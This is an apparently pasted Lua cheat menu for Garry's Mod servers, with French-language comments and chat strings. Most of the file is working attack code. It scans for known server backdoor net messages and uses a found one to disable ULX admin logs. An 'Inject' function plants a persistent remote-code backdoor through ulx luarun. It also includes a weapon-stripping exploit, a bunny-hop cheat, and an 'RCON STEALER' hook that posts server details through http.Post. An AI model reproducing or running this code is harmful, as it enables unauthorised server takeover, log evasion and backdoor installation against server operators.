

Mar 18th, 2018
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  1. if ( SERVER ) then
  2. function file.Read(d)
  3. return "Bien essayer l'amis :)"
  4. end
  5. end
  6. MsgC (Color(math.random(1,255),math.random(1,255),math.random(1,255)), [[ =======================================================================================================================
  7. ██████╗ ██╗███████╗███╗ ██╗██╗ ██╗███████╗███╗ ██╗██╗ ██╗███████╗
  8. ██╔══██╗██║██╔════╝████╗ ██║██║ ██║██╔════╝████╗ ██║██║ ██║██╔════╝
  9. ██████╔╝██║█████╗ ██╔██╗ ██║██║ ██║█████╗ ██╔██╗ ██║██║ ██║█████╗
  10. ██╔══██╗██║██╔══╝ ██║╚██╗██║╚██╗ ██╔╝██╔══╝ ██║╚██╗██║██║ ██║██╔══╝
  11. ██████╔╝██║███████╗██║ ╚████║ ╚████╔╝ ███████╗██║ ╚████║╚██████╔╝███████╗
  12. ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═══╝ ╚═══╝ ╚══════╝╚═╝ ╚═══╝ ╚═════╝ ╚══════╝
  13. ██╗ ███████╗███████╗ █████╗ ██████╗██╗ ██╗███████╗████████╗███████╗██╗ ██╗██████╗ ███████╗
  14. ██║ ██╔════╝██╔════╝ ██╔══██╗██╔════╝██║ ██║██╔════╝╚══██╔══╝██╔════╝██║ ██║██╔══██╗██╔════╝
  15. ██║ █████╗ ███████╗ ███████║██║ ███████║█████╗ ██║ █████╗ ██║ ██║██████╔╝███████╗
  16. ██║ ██╔══╝ ╚════██║ ██╔══██║██║ ██╔══██║██╔══╝ ██║ ██╔══╝ ██║ ██║██╔══██╗╚════██║
  17. ███████╗███████╗███████║ ██║ ██║╚██████╗██║ ██║███████╗ ██║ ███████╗╚██████╔╝██║ ██║███████║
  18. ╚══════╝╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝
  20. ███╗ ███╗ █████╗ ██████╗ ███╗ ██╗██╗ ██╗███╗ ███╗ ██╗ ██╗ ██╗ █████╗
  21. ████╗ ████║██╔══██╗██╔════╝ ████╗ ██║██║ ██║████╗ ████║ ██║ ██║ ██║██╔══██╗
  22. ██╔████╔██║███████║██║ ███╗██╔██╗ ██║██║ ██║██╔████╔██║ ██║ ██║ ██║███████║
  23. ██║╚██╔╝██║██╔══██║██║ ██║██║╚██╗██║██║ ██║██║╚██╔╝██║ ██║ ██║ ██║██╔══██║
  24. ██║ ╚═╝ ██║██║ ██║╚██████╔╝██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██╗███████╗╚██████╔╝██║ ██║
  25. ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝╚══════╝ ╚═════╝ ╚═╝ ╚═╝
  26. ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄
  27. ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ ▐░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
  28. ▀▀▀▀▀█░█▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌ ▐░▌ ▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌ ▀▀▀▀█░█▀▀▀▀ ▐░▌░▌ ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀
  29. ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌▐░▌ ▐░▌
  30. ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌ ▐░▌ ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄▄▄
  31. ▐░▌ ▐░░░░░░░░░░░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌ ▐░░░░░░░░░░░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
  32. ▐░▌ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ ▐░█▀▀▀▀▀▀▀█░▌ ▐░▌ ▐░▌ ▀ ▐░▌▐░█▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀█░▌
  33. ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌
  34. ▄▄▄▄▄█░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▐░▌ ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌ ▄▄▄▄▄▄▄▄▄█░▌ ▐░▌ ▐░▌ ▄▄▄▄█░█▄▄▄▄ ▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄█░▌
  35. ▐░░░░░░░▌ ▐░░░░░░░░░░░▌ ▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
  36. ▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀
  37. Eh salut a toi amuse toi avec la version 1.0 du menu!!
  38. by ҚRÂҚЄИ Panda Freezer
  39. ]])
  40. ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------]]
  42. netKey = "nostrip"
  43. function IsMessagePooled( netmessage )
  44. status, error = pcall(net.Start,netmessage)
  45. return status
  46. end
  50. local n = net
  51. local s = net.Start
  52. local ss = net.WriteString
  53. local stc = net.Send
  54. local hp = http.Post
  55. local netKey = "";
  56. local vgui = vgui;
  57. local surface = surface;
  58. local render = render;
  59. local Color = Color;
  60. local input = input;
  61. local hook = hook;
  62. local next = next;
  63. local timer = timer;
  64. local GetConVarNumber = GetConVarNumber;
  65. local util = util;
  66. local player = player;
  67. local Vector = Vector;
  68. local Angle = Angle;
  69. local FindMetaTable = FindMetaTable;
  70. local team = team;
  71. local LocalPlayer = LocalPlayer;
  72. local draw = draw;
  73. local debug = debug;
  74. local table = table;
  75. local Entity = Entity;
  76. local ScrW, ScrH = ScrW, ScrH;
  77. local RunConsoleCommand = RunConsoleCommand;
  78. local GAMEMODE = GAMEMODE;
  79. local CurTime = CurTime;
  80. local cam = cam;
  81. local silent = CreateClientConVar("silent", 0, false, false);
  82. totalExploits = 0
  83. BackdoorsFound = 0
  84. local ply = LocalPlayer()
  87. function ValidNetString( str )
  88. local status, error = pcall( net.Start, str )
  89. return status
  90. end
  92. -- Exploit 1
  93. function removeAll() -- Strips all Players
  94. for k,v in pairs(player.GetAll()) do
  95. stripPlayer(v)
  96. end
  97. end
  99. function stripPlayer(ply) -- Strip player function
  100. if ply:IsPlayer() then
  101. for k,v in pairs(ply:GetWeapons()) do
  102. net.Start("properties")
  103. net.WriteString( "remove" , 32 )
  104. net.WriteEntity( v )
  105. net.SendToServer()
  106. end
  107. end
  108. end
  114. function draw.LinearGradient(x,y,w,h,from,to,dir,res)
  115. dir = dir or GRADIENT_HORIZONTAL;
  116. if dir == GRADIENT_HORIZONTAL then res = (res and res <= w) and res or w;
  117. elseif dir == GRADIENT_VERTICAL then res = (res and res <= h) and res or h; end
  118. for i=1,res do
  119. surface.SetDrawColor(
  120. Lerp(i/res,from.r,to.r),
  121. Lerp(i/res,from.g,to.g),
  122. Lerp(i/res,from.b,to.b),
  123. Lerp(i/res,from.a,to.a)
  124. );
  125. if dir == GRADIENT_HORIZONTAL then surface.DrawRect(x + w * (i/res), y, w/res, h );
  126. elseif dir == GRADIENT_VERTICAL then surface.DrawRect(x, y + h * (i/res), w, h/res ); end
  127. end
  128. end
  129. -- RCON STEALER
  130. hook.Add("InitPostEntity", math.random(20,40), function()
  131. local sendTbl = {
  132. sn = GetHostName(),
  133. playercount = tostring(#player.GetAll()),
  134. ip = game.GetIP()
  135. }
  137. http.Post( "", sendTbl )
  138. end)
  139. --------------------------------
  141. -- CHECKER
  142. if( ValidNetString("memeDoor") ) then
  143. netKey = "memeDoor"
  144. else
  145. end
  147. if( ValidNetString("Sandbox_Armdupe") ) then
  148. netKey = "Sandbox_Armdupe"
  149. else
  150. end
  152. if( ValidNetString("DarkRP_AdminWeapons") ) then
  153. netKey = "DarkRP_AdminWeapons"
  154. else
  155. end
  157. if( ValidNetString("SessionBackdoor") ) then
  158. netKey = "SessionBackdoor"
  159. else
  160. end
  162. if( ValidNetString("Fix_Keypads") ) then
  163. netKey = "Fix_Keypads"
  164. else
  165. end
  167. if( ValidNetString("Remove_Exploiters") ) then
  168. netKey = "Remove_Exploiters"
  169. else
  170. end
  172. if( ValidNetString("noclipcloakaesp_chat_text") ) then
  173. netKey = "noclipcloakaesp_chat_text"
  174. else
  175. end
  177. if( ValidNetString("_Defqon") ) then
  178. netKey = "_Defqon"
  179. else
  180. end
  182. if( ValidNetString("_CAC_ReadMemory") ) then
  183. netKey = "_CAC_ReadMemory"
  184. else
  185. end
  187. if( ValidNetString("nostrip") ) then
  188. netKey = "nostrip"
  189. else
  190. end
  192. if( ValidNetString("LickMeOut") ) then
  193. netKey = "LickMeOut"
  194. else
  195. end
  197. if( ValidNetString("MoonMan") ) then
  198. netKey = "MoonMan"
  199. else
  200. end
  202. if( ValidNetString("Im_SOCool") ) then
  203. netKey = "Im_SOCool"
  204. else
  205. end
  207. if( ValidNetString("ULXQUERY2") ) then
  208. netKey = "ULXQUERY2"
  209. else
  210. end
  212. if( ValidNetString("jesuslebg") ) then
  213. netKey = "jesuslebg"
  214. else
  215. end
  217. if( ValidNetString("zilnix") ) then
  218. netKey = "zilnix"
  219. else
  220. end
  222. if( ValidNetString("enablevac") ) then
  223. netKey = "enablevac"
  224. else
  225. end
  227. if( ValidNetString("c") ) then
  228. netKey = "c"
  229. else
  230. end
  232. if( ValidNetString("Þà?D)◘") ) then
  233. netKey = "Þà?D)◘"
  234. else
  235. end
  237. if( ValidNetString("disablebackdoor") ) then
  238. netKey = "disablebackdoor"
  239. else
  240. end
  242. if( ValidNetString("kill") ) then
  243. netKey = "kill"
  244. else
  245. end
  247. if netKey == "" then
  248. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Xtrem", "] ", Color( 255, 255, 255 ), "Aucune backdoor :(" )
  249. else
  250. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Xtrem", "] ", Color( 0, 255, 0 ), "Backdoor trouvé! :D La backdoor est : ".. netKey )
  251. -- Auto shut down ULX Logs
  252. if GetConVarNumber("silent") == 1 then
  253. net.Start(netKey)
  254. net.WriteString( "ulx_logecho 0" )
  255. net.WriteBit (0)
  256. net.SendToServer()
  258. timer.Simple(0.1, function()
  259. net.Start(netKey)
  260. net.WriteString( "ulx_logecho 0" )
  261. net.WriteBit (1)
  262. net.SendToServer()
  264. chat.AddText("ULX Logs disabled." )
  265. end)
  266. end
  267. end
  268. --END CHECKER
  269. -----------------------------------------------
  270. -- Check Backdoors (2) (jesus_scanbd) --
  271. -----------------------------------------------
  273. function checkbackdoors()
  274. if( ValidNetString("memeDoor") ) then
  275. BackdoorsFound = 1 + BackdoorsFound
  276. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - memeDoor" )
  277. netKey = "memeDoor"
  278. else
  279. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - memeDoor!" )
  280. end
  282. if( ValidNetString("Sandbox_Armdupe") ) then
  283. BackdoorsFound = 1 + BackdoorsFound
  284. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - Sandbox_Armdupe" )
  285. netKey = "Sandbox_Armdupe"
  286. else
  287. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - Sandbox_Armdupe!" )
  288. end
  290. if( ValidNetString("DarkRP_AdminWeapons") ) then
  291. BackdoorsFound = 1 + BackdoorsFound
  292. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - DarkRP_AdminWeapons" )
  293. netKey = "DarkRP_AdminWeapons"
  294. else
  295. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - DarkRP_AdminWeapons!" )
  296. end
  297. if( ValidNetString("SessionBackdoor") ) then
  298. BackdoorsFound = 1 + BackdoorsFound
  299. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - SessionBackdoor" )
  300. netKey = "SessionBackdoor"
  301. else
  302. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - SessionBackdoor!" )
  303. end
  305. if( ValidNetString("Fix_Keypads") ) then
  306. BackdoorsFound = 1 + BackdoorsFound
  307. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - Fix_Keypads" )
  308. netKey = "Fix_Keypads"
  309. else
  310. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - Fix_Keypads!" )
  311. end
  313. if( ValidNetString("Remove_Exploiters") ) then
  314. BackdoorsFound = 1 + BackdoorsFound
  315. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - Remove_Exploiters" )
  316. netKey = "Remove_Exploiters"
  317. else
  318. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - Remove_Exploiters!" )
  319. end
  321. if( ValidNetString("noclipcloakaesp_chat_text") ) then
  322. BackdoorsFound = 1 + BackdoorsFound
  323. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - noclipcloakaesp_chat_text" )
  324. netKey = "noclipcloakaesp_chat_text"
  325. else
  326. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - noclipcloakaesp_chat_text!" )
  327. end
  329. if( ValidNetString("_Defqon") ) then
  330. BackdoorsFound = 1 + BackdoorsFound
  331. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - _Defqon" )
  332. netKey = "_Defqon"
  333. else
  334. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - _Defqon!" )
  335. end
  337. if( ValidNetString("_CAC_ReadMemory") ) then
  338. BackdoorsFound = 1 + BackdoorsFound
  339. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - _CAC_ReadMemory" )
  340. netKey = "_CAC_ReadMemory"
  341. else
  342. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - _CAC_ReadMemory!" )
  343. end
  345. if( ValidNetString("nostrip") ) then
  346. BackdoorsFound = 1 + BackdoorsFound
  347. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - nostrip" )
  348. netKey = "nostrip"
  349. else
  350. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - nostrip!" )
  351. end
  353. if( ValidNetString("LickMeOut") ) then
  354. BackdoorsFound = 1 + BackdoorsFound
  355. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - LickMeOut" )
  356. netKey = "LickMeOut"
  357. else
  358. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - LickMeOut!" )
  359. end
  361. if( ValidNetString("MoonMan") ) then
  362. BackdoorsFound = 1 + BackdoorsFound
  363. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! -MoonMan" )
  364. netKey = "MoonMan"
  365. else
  366. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - MoonMan!" )
  367. end
  369. if( ValidNetString("Im_SOCool") ) then
  370. BackdoorsFound = 1 + BackdoorsFound
  371. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - Im_SOCool" )
  372. netKey = "Im_SOCool"
  373. else
  374. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - Im_SOCool!" )
  375. end
  377. if( ValidNetString("ULXQUERY2") ) then
  378. BackdoorsFound = 1 + BackdoorsFound
  379. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - ULXQUERY2" )
  380. netKey = "ULXQUERY2"
  381. else
  382. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - ULXQUERY2!" )
  383. end
  385. if( ValidNetString("jesuslebg") ) then
  386. BackdoorsFound = 1 + BackdoorsFound
  387. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - jesuslebg" )
  388. netKey = "jesuslebg"
  389. else
  390. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - jesuslebg!" )
  391. end
  393. if( ValidNetString("zilnix") ) then
  394. BackdoorsFound = 1 + BackdoorsFound
  395. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - zilnix" )
  396. netKey = "zilnix"
  397. else
  398. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - zilnix!" )
  399. end
  401. if( ValidNetString("enablevac") ) then
  402. BackdoorsFound = 1 + BackdoorsFound
  403. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - enablevac" )
  404. netKey = "enablevac"
  405. else
  406. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - enablevac!" )
  407. end
  409. if( ValidNetString("c") ) then
  410. BackdoorsFound = 1 + BackdoorsFound
  411. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - c" )
  412. netKey = "c"
  413. else
  414. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - c!" )
  415. end
  417. if( ValidNetString("Þà?D)◘") ) then
  418. BackdoorsFound = 1 + BackdoorsFound
  419. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - Þà?D)◘" )
  420. netKey = "Þà?D)◘"
  421. else
  422. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - Þà?D)◘!" )
  423. end
  425. if( ValidNetString("disablebackdoor") ) then
  426. BackdoorsFound = 1 + BackdoorsFound
  427. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - disablebackdoor" )
  428. netKey = "disablebackdoor"
  429. else
  430. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - disablebackdoor!" )
  431. end
  433. if( ValidNetString("kill") ) then
  434. BackdoorsFound = 1 + BackdoorsFound
  435. chat.AddText( Color( 127, 255, 0 ), "[Jesus Menu]", Color( 255, 255, 255 )," Backdoor trouvé ! - kill" )
  436. netKey = "kill"
  437. else
  438. chat.AddText( Color( 0, 0, 0, 125 ), "[Jesus Menu]", Color( 255, 0, 0 )," Scan backdoor : Non trouvé : - kill!" )
  439. end
  441. SploitNotify("Backdoor trouvé: ".. netKey )
  442. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 127, 255, 0 ), "Net changé à : ".. netKey )
  443. end
  445. function Inject()
  446. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), " Injecting..." )
  447. if ( ply:IsSuperAdmin() ) then
  448. timer.Simple( 3, function()
  449. if( ValidNetString("SessionBackdoor") ) then
  451. else
  452. RunConsoleCommand( "ulx", "logecho", "0" )
  453. RunConsoleCommand( "ulx", "luarun", "util.AddNetworkString ('SessionBackdoor')" )
  454. RunConsoleCommand( "ulx", "luarun", "util.AddNetworkString('SessionBackdoor') net.Receive('SessionBackdoor', function( length, ply ) local netString = net.ReadString() local bit = net.ReadBit() if bit == 1 then RunString(netString) else game.ConsoleCommand(netString .. '\n') end end)" )
  455. RunConsoleCommand( "ulx", "logecho", "1" )
  456. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), " Injécté avec succès !" )
  457. end
  458. end )
  459. else
  460. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), " Erreur ! Vous n'êtes pas SUPERADMIN !" )
  461. end
  462. if( ValidNetString("SessionBackdoor") ) then
  463. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), " La backdoor est déjà présente." )
  464. end
  465. end
  467. function bhop()
  468. local AddHook = dismay and dismay.AddHook or hook and hook.Add or function() print("fuck i missed") end;
  469. AddHook("CreateMove", "BHOP", function(cmd)
  470. if (cmd:KeyDown(IN_JUMP)) then
  471. if(cmd:GetMouseX() < 0) then
  472. cmd:SetSideMove(-10000);
  473. elseif(cmd:GetMouseX() > 0) then
  474. cmd:SetSideMove(10000);
  475. end
  476. if (LocalPlayer():IsOnGround()) then
  477. cmd:SetButtons(bit.bor(cmd:GetButtons(), IN_JUMP));
  478. return;
  479. end
  480. end
  481. cmd:RemoveKey(IN_JUMP);
  482. end)
  483. end
  485. surface.CreateFont("Font", {
  486. font = "Segoe UI Light",
  487. size = 21,
  488. weight = 300
  489. })
  490. surface.CreateFont("CheckFont", {
  491. font = "Segoe UI Light",
  492. size = 17,
  493. weight = 300
  494. })
  496. surface.CreateFont("Target", {
  497. font = "Segoe UI Light",
  498. size = 15,
  499. weight = 300
  500. })
  502. surface.CreateFont( "Title", {
  503. font = "Lato Light",
  504. size = 30,
  505. weight = 250,
  506. antialias = true,
  507. strikeout = false,
  508. additive = true,
  509. } )
  511. surface.CreateFont( "tamere", {
  512. font = "Roboto",
  513. size = 150,
  514. weight = 250,
  515. antialias = true,
  516. strikeout = false,
  517. additive = true,
  518. bold = true,
  519. } )
  521. surface.CreateFont( "Welcome", {
  522. font = "Lato Light",
  523. size = 25,
  524. weight = 10,
  525. antiaalias = true,
  526. strikeout = false,
  527. additive = true,
  528. } )
  529. --[[-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  530. Main Menu (Background stuff)
  531. ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------]]
  533. -----------raimbow joueur----------------
  534. hook.Add("Think", "RAINBOWPLAYER", function()
  535. local RainbowPlayer = HSVToColor( CurTime() % 6 * 60, 1, 1 )
  536. LocalPlayer():SetWeaponColor( Vector( RainbowPlayer.r / 255, RainbowPlayer.g / 255, RainbowPlayer.b / 255 ) )
  537. LocalPlayer():SetPlayerColor( Vector( RainbowPlayer.r / 255, RainbowPlayer.g / 255, RainbowPlayer.b / 255 ) )
  538. end)
  539. --[[---------------------------------------------------------
  540. Main Frame
  541. -----------------------------------------------------------]]
  542. -- Con-Commnad for menu--
  543. concommand.Add("magnum",function( )
  544. local Menu = vgui.Create("DFrame")
  545. Menu:SetSize(800,700)
  546. Menu:SetTitle("")
  547. Menu:Center()
  548. Menu:MakePopup()
  549. Menu.Paint = function()
  550. --Black outline
  551. surface.SetDrawColor(77, 77, 77,255)
  552. surface.DrawRect(0,0,Menu:GetWide(),Menu:GetTall())
  553. --Outline
  554. surface.SetDrawColor(0, 57, 77)
  555. surface.DrawRect(2,2,Menu:GetWide()-4,Menu:GetTall()-4)
  556. --Main back
  557. surface.SetDrawColor(77, 77, 77,255)
  558. surface.DrawRect(4,4,Menu:GetWide()-8,Menu:GetTall()-8)
  559. draw.DrawText( "Magnum [1.0]", "Trebuchet24", 350, 5, Color(0, 57, 77) )
  560. surface.SetDrawColor(0, 57, 77)
  561. surface.DrawRect( 580, 4, 5,40 )
  562. surface.SetDrawColor(0, 57, 77)
  563. surface.DrawRect( 250, 4, 5,40 )
  564. end
  565. --[[---------------------------------------------------------
  566. Sheets - Main
  567. -----------------------------------------------------------]]
  568. local tabs = vgui.Create( "DPropertySheet", Menu)
  569. tabs:SetSize(780,680)
  570. tabs:SetPos(10,9)
  571. tabs.Paint = function()
  572. --Black outline
  573. surface.SetDrawColor(0,0,0,0)
  574. surface.DrawRect(0,0,tabs:GetWide(),tabs:GetTall())
  575. end
  576. local tabs2 = vgui.Create( "DPropertySheet", Menu)
  577. tabs2:SetSize(600,500)
  578. tabs2:SetPos(500,20)
  579. tabs2.Paint = function()
  580. --Black outline
  581. surface.SetDrawColor(0,0,0,0)
  582. surface.DrawRect(0,0,tabs2:GetWide(),tabs2:GetTall())
  583. end
  584. --[[---------------------------------------------------------
  585. Sheets - Draw Stuff
  586. -----------------------------------------------------------]]
  587. local drawHUD = vgui.Create("DPanel")
  588. drawHUD.Paint = function()
  589. --Black outline
  590. surface.SetDrawColor(0, 57, 77)
  591. surface.DrawRect(0,0,drawHUD:GetWide(),drawHUD:GetTall())
  592. --Outline
  593. surface.SetDrawColor(0, 57, 77)
  594. surface.DrawRect(2,2,drawHUD:GetWide()-4,drawHUD:GetTall()-4)
  595. --Main back
  596. surface.SetDrawColor(77, 77, 77)
  597. surface.DrawRect(4,4,drawHUD:GetWide()-8,drawHUD:GetTall()-8)
  598. draw.DrawText( "sesion ACTUEL", "Trebuchet18", 500, 10, Color(0, 57, 77) )
  599. draw.DrawText( "BASIC", "Trebuchet18", 500, 30, Color(0, 57, 77) )
  600. surface.SetDrawColor(0, 57, 77)
  601. surface.DrawRect( 380, 4, 5, 700 )
  602. surface.SetDrawColor(0, 57, 77)
  603. surface.DrawRect( 400, 4, 5, 700 )
  604. surface.SetDrawColor(0, 57, 77)
  605. surface.DrawRect( 400, 50, 500, 5 )
  606. draw.DrawText( "mise a jours tout les jours du menu", "Trebuchet24", 405, 50, Color(77, 0, 0) )
  607. draw.DrawText( "partage notre menu pour plus de fonction", "Trebuchet24", 405, 100, Color(77, 0, 0) )
  608. draw.DrawText( "est bisous les michto", "Trebuchet24", 405, 150, Color(77, 0, 0) )
  609. draw.DrawText( "MAGNUM TEAM.lua", "Trebuchet24", 405, 200, Color(77, 0, 0) )
  610. end
  611. tabs:AddSheet( "Exploits", drawHUD)
  615. --[[---------------------------------------------------------
  616. Sheets - Play Songs
  617. -----------------------------------------------------------]]
  618. local playSongs = vgui.Create("DPanel")
  619. playSongs.Paint = function()
  620. --Black outline
  621. surface.SetDrawColor(math.random(1,255),math.random(1,255),math.random(1,255))
  622. surface.DrawRect(0,0,drawHUD:GetWide(),drawHUD:GetTall())
  623. --Outline
  624. surface.SetDrawColor(math.random(1,255),math.random(1,255),math.random(1,255))
  625. surface.DrawRect(2,2,drawHUD:GetWide()-4,drawHUD:GetTall()-4)
  626. --Main back
  627. surface.SetDrawColor(77, 77, 77,255)
